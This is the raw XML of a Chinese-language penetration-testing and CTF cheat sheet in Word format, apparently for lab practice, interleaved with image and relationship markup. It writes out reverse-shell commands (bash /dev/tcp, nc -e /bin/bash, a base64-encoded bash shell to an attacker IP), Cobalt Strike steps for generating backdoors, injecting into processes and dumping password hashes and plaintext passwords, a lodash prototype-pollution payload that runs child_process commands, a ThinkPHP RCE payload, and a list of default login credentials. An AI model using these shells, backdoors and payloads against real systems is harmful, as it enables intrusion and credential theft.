      <w:bookmarkEnd w:id="9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用来扫描制定url下的漏洞，在桌面打开cmd使用指令：./xray_linux_amd64 webscan -u url地址 --ho result.html，即可查看漏洞信息并且结果保存在了桌面的result.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3431540"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270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3188335"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="1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3" w:name="_Toc20924"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口监听反弹shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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监听指令：nc -lnvp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反弹shell命令：bash -c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bash -i &gt;&amp; url地址 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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&amp;代表指针位置，&gt;等价于1&gt;，也就是说靶机的输出被写到攻击者的机器上（/dev/tcp/&lt;LHOST&gt;/&lt;LPORT&gt;），因此攻击者能够监听到在受害者机器的shell上执行的所有命令的结果，但他自己无法执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="1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666750"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1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netcat: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nc -e /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url地址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base64：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bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'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4" w:name="_Toc12418"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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双击cobaltstrike4.5.vbs打开后，输入IP、端口、连接密码后点击连接后点击Yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3253740" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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60520" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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之后点击二级图标，配置好名字、IP、端口后点击保存后弹出框点击OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2951480"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080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491740" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1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点击攻击-&gt;生成后门-&gt;HTA文档，选择监听器监听对象后设置Method后点击生成攻击文件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040" cy="1445895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="166" name="图片 166" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18060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177925"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10795"/>
            <wp:docPr id="1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val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点击攻击-&gt;生成后门-&gt;Payload生成器，同上选择监听器监听对象后设置Method后点击生成攻击文件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1407795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="169" name="图片 169" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 181609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同样Windows可执行程序(E)和Windows可执行程序(Stageless)生成方式同上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086100" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="170" name="图片 170" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18210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双击生成的Windows可执行程序(E)攻击脚本，上方栏出现一条数据，右键该数据点击会话交互新建下方栏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="708660" cy="739140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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2477135"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="172" name="图片 172" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18241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输入：sleep 1避免长时间等待</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3169920" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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删除回话需要先输入exit再右键数据-&gt;会话操作-&gt;删除会话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4608195"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="175" name="图片 175" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18364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右键管理员权限启动攻击脚本后会显示用户后方加*号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="640715"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="1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右键数据-&gt;浏览数据-&gt;进程列表-&gt;选择进程-&gt;注入-&gt;选择payload-&gt;选择后，会生成对应进程的数据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1463040"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="177" name="图片 177" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 1845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870075"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="1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8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右键数据-&gt;浏览探测-&gt;屏幕截图即可截图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4276725"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5715"/>
            <wp:docPr id="179" name="图片 179" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18494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右键管理员的数据-&gt;凭证提取-&gt;抓取Hash可以看到Hash值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7960" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="5080" b="13335"/>
            <wp:docPr id="180" name="图片 180" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18521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抓取明文密码方式同上，只不过换个子菜单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="1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5" w:name="_Toc18348"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web二进制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95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96" w:name="_Toc2577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1.JaveScript反混淆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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首先建立一个HTML文件引用js文件。类似下面这种（注意修改引用js文件名）：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&lt;html&gt;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&lt;title&gt;Test&lt;/title&gt;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&lt;h1&gt;Test&lt;/h1&gt;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&lt;script src="./flag.js"&gt;&lt;/script&gt;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&lt;/html&gt;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之后将js文件格式化并保存，然后与HTML文件放在同一个文件夹下，谷歌浏览器访问HTML文件，之后F12在Source中给js打断点后刷新页面点击Step按钮即可断点执行并查看单步运行结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="1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97" w:name="_Toc1212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2.PHP扩展逆向</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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如果存在so后缀名文件，在反编译工具分析结束后，观察函数列表，寻找关键生命周期函数zm_startup_encrypt_php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1372235"/>
            <wp:effectExtent l="0" t="0" r="0" b="146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分析关键生命周期函数的语义，理解并找到关键 PHP 文件处理函数encrypt_compile_file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0698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 PHP 文件处理函数中的逻辑，并找到关键文件加密函数并通过Python脚本解密保存得到解密PHP文件打开查看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38705"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255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19798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编写解密脚本并进行解密后保存为新的PHP文件并打开，脚本类似下面这样（注意修改为对应的解密算法）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3" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId317" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1063" DrawAspect="Content" ObjectID="_1468075763" r:id="rId316">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1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98" w:name="_Toc2015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3.字节码恢复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/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99" w:name="_Toc1310"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99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在Ubuntu中pyc文件对应的文件夹中打开终端输入：uncompyle6 -o 输出文件名 pyc文件名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00" w:name="_Toc11352"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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Jar文件直接解压即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1220470"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="1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</w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc32662"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Git_Extract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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python2环境下使用，运行指令：python git_extract.py url地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2915920"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1016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</w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc29322"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NodeJS原型链污染以及模板注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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获取源码并编译，解压压缩包，得到源代码：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381125" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="19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0" descr="IMG_25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在解压得到的文件中，主要的路由以及处理逻辑定义都在server.js中，针对server.js进行分析，可以发现如下的代码段：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app.all('/', (req, res) =&gt;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let data = req.session.data || {language: [], category: []}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(req.method == 'POST')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data = lodash.merge(data, req.body)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req.session.data = data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res.render('index',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language: data.language,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category: data.category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根路径，以POST方式发送数据时，会通过lodash依赖中的merge函数对传入的HTTP数据进行合并，根据我们对于原型链污染利用的学习，lodash.merge函数存在原型链污染漏洞，如果进行合并操作的数据没有经过安全校验，将导致proto键被污染的情况，从而导致危险函数被控制。并且可以发现使用了ejs的template渲染，那么可以通过污染sourceURL来实现利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构造数据完成利用，打开页面，可以看到如下内容：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08270" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="191" name="图片 41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1" descr="IMG_25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点击空白框，任意选择两个值，进行提交，观察提交的数据格式：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63570" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
            <wp:docPr id="187" name="图片 42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2" descr="IMG_25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95600" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="189" name="图片 43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3" descr="IMG_25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因此是符合merge操作的数据需求的。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此时，我们可以按照该请求的格式发送用于原型链污染的数据，结合lodash.template()用法，可以构造出利用数据：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{"__proto__" : {"sourceURL" : "\r\nreturn e = () =&gt; {return global.process.mainModule.constructor._load('child_process').execSync('dir').toString()}\r\n"}}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44465" cy="645795"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="188" name="图片 44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4" descr="IMG_26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64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103" w:name="_Toc15698"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>杂七杂八的东西</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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F12查看网站源代码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F12查看网站网络选项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94155"/>
            <wp:effectExtent l="0" t="0" r="635" b="14605"/>
            <wp:docPr id="1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 RCE 漏洞payload：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Index.php?s=/Index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=md5&amp;vars[1][]=3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网站登录通用：用户名admin或者test，密码admin或者123456或者test或者12345678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注入页面判断：表单输入，报错页面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845BE7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE845BE7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1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245FE0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C245FE0E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EED08245"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EED08245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5706A8C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="45706A8C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hOTIzZmFjNzM2NjNkMWJjODQ0ZmQ5OTg4MjU2MDAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="012E11C9"/>
    <w:rsid w:val="03C757C6"/>
    <w:rsid w:val="078C16E9"/>
    <w:rsid w:val="12AC21C3"/>
    <w:rsid w:val="14397E9E"/>
    <w:rsid w:val="27BF53C1"/>
    <w:rsid w:val="2B624A45"/>
    <w:rsid w:val="36B917AB"/>
    <w:rsid w:val="382A7E1C"/>
    <w:rsid w:val="3B7A0B70"/>
    <w:rsid w:val="45071626"/>
    <w:rsid w:val="4D4025AF"/>
    <w:rsid w:val="526D31F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  <w:style w:type="character" w:customStyle="1" w:styleId="17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yperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163458203.png" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163411454.png" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163320918.png" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106150010176.png" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145957508.png" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230109145330509.png" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230109145101964.png" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145753056.png" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145730731.png" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145648317.png" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145638364.png" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145610793.png" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/003/image-20230106145554582.png" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153543117.png" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153522412.png" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153318906.png" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153248438.png" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153452077.png" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153222511.png" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153104533.png" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153035579.png" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106153012424.png" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106152921240.png" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106152812867.png" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/004/image-20230106152601080.png" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162542572.png" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162528655.png" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162515867.png" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162359597.png" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162334810.png" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229162039779.png" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://typora-test1.oss-cn-hangzhou.aliyuncs.com/img/image-20221229161639628.png" TargetMode="Externa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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.emf"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject39.bin"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId31" 